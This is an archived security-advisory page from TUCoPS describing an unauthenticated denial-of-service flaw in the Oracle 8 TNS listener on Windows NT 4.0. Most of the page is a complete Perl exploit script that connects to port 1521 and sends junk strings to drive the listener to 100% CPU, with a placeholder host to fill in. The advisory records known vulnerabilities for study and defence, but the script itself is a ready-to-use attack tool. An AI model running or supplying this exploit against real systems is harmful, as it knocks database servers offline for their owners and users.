TUCoPS :: Windows Apps :: oracle.htm

Oracle 8 for NT crash exploit 
Vulnerability

    Oracle

Affected

    Oracle 8

Description

    'r0ot' found following.   Attached is a little  perl-script, which
    makes TNSLSNR80.EXE consume all available cpu-time so the computer
    becomes unusable.   It works on  Oracle 8 servers  running Windows
    NT 4.0 (SP6) and  does not require any  authentication credentials
    to succeed.   This has  not been  tried on  any other  versions or
    platforms.

    #!/usr/local/bin/perl -w
    
    # This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
    # TNSLSNR80.EXE will consume 100% CPU...
    #
    # by r0ot@runbox.com
    
    use IO::Socket;
    
    $host="kickme";
    # enter the hostname of the oracle-server to kick
    
    socket(HANDLE, PF_INET, SOCK_STREAM, 6);
    connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
    HANDLE->autoflush(1);
    
    sleep(2);
    print HANDLE "\n";
    for ($i=0; $i<3; $i++) {
            sleep(2);
            print HANDLE "dfsdffdfsfdggfdgdf";
            # an arbitrary, but carefully chosen constant...
    }
    
    close(HANDLE);

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH